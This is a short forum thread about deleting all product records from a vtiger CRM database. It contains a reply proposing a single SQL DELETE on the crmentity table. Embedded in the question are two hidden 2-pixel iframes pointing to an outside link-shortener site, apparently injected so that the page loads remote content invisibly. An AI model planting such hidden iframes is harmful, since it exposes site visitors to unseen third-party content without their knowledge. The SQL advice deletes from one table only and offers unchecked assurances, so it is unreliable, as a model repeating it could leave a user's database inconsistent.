currently im running test on my vtiger server and it turns out that I need to delete all the products in the database and copy with the new one.
what I want to ask is that how do you delete this item products all in one click since i've managed to populate 28k of item product listing <!-- s:shock: --><img src="{SMILIES_PATH}/icon_eek.gif" alt=":shock:" title="Shocked" /><!-- s:shock: -->
re-installing the vtiger is not an option because I made some custom changes in the vtiger installation (by 3rd party software consultant) <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;
Comments
if you want to delete all the products from your database you can do it from your database.
go to your database and use this command
delete from vtiger_crmentity where setype = "products"
this will delete all the products from your database.
thank you for your answer.
another question, will it be a problem if i keep the quotes and purchase order records? or should i erase all of these records? these will be just a records for future references.
there wont be any problem with quotes and purchase orders no need to delete these records.